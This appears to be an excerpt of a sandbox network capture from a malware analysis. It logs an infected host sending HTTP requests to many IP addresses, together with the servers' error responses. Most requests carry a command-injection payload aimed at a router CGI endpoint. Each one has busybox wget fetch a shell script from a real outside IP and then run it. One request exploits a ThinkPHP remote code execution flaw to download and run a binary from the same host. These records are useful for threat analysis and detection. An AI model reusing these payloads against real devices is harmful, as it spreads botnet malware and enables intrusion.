                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        297192.168.2.144321831.200.68.558080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.283782959 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        298192.168.2.144778494.121.201.1368080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.285275936 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        299192.168.2.144244494.123.255.988080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.287164927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        300192.168.2.145837031.25.12.1578080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.337774992 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        301192.168.2.1449420119.201.85.10323
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.493901014 CET179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 37 3a 33 33 3a 33 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 17:33:35Auth Result: Invalid user.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        302192.168.2.143980888.93.245.9880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.495798111 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:32.775578022 CET215INData Raw: 53 65 72 76 65 72 3a 20 61 6c 70 68 61 70 64 0d 0a 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 30 39 3a 33 33 3a 33 32 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20
                                                        Data Ascii: Server: alphapdDate: Wed Feb 14 09:33:32 2024Pragma: no-cacheCache-Control: no-cacheContent-type: text/htmlContent-length: 62<html><body><h1>The request is forbidden.</h1></body></html>
                                                        Feb 14, 2024 09:33:32.775593042 CET36INHTTP/1.1 403 Forbidden


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        303192.168.2.143701431.135.9.978080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.521970034 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:32.760829926 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:33:32 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        304192.168.2.144014685.133.143.78080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:32.617304087 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:32.898612022 CET158INHTTP/1.1 404 Not Found
                                                        Content-Type: text/plain
                                                        Date: Wed, 14 Feb 2024 08:33:32 GMT
                                                        Content-Length: 18
                                                        Connection: close
                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                        Data Ascii: 404 page not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        305192.168.2.144797031.136.69.1068080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:33.009746075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:36.231810093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:42.375514030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:54.407078028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:18.726191998 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:07.876039028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        306192.168.2.144071431.136.9.1598080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:33.029874086 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:36.231794119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:42.375551939 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:54.407047033 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:18.726242065 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:07.876039982 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        307192.168.2.1449476119.201.85.10323
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:33.071999073 CET179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 37 3a 33 33 3a 33 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 17:33:35Auth Result: Invalid user.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        308192.168.2.145411431.24.33.1728080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:33.224200964 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:33.417798996 CET820INHTTP/1.1 500 Internal Server Error
                                                        Date: Wed, 14 Feb 2024 08:33:33 GMT
                                                        Server: Apache/2.2.22 (Ubuntu)
                                                        Content-Length: 616
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2c 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 61 6e 64 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 61 6e 64 20 61 6e 79 74 68 69 6e 67 20 79 6f 75 20 6d 69 67 68 74 20 68 61 76 65 20 64 6f 6e 65 20 74 68 61 74 20 6d 61 79 20 68 61 76 65 0a 63 61 75 73 65 64 20 74 68 65 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 32 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator, [no address given] and inform them of the time the error occurred,and anything you might have done that may havecaused the error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.2.22 (Ubuntu) Server at 192.168.0.14 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        309192.168.2.145632031.136.174.918080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:33.427930117 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
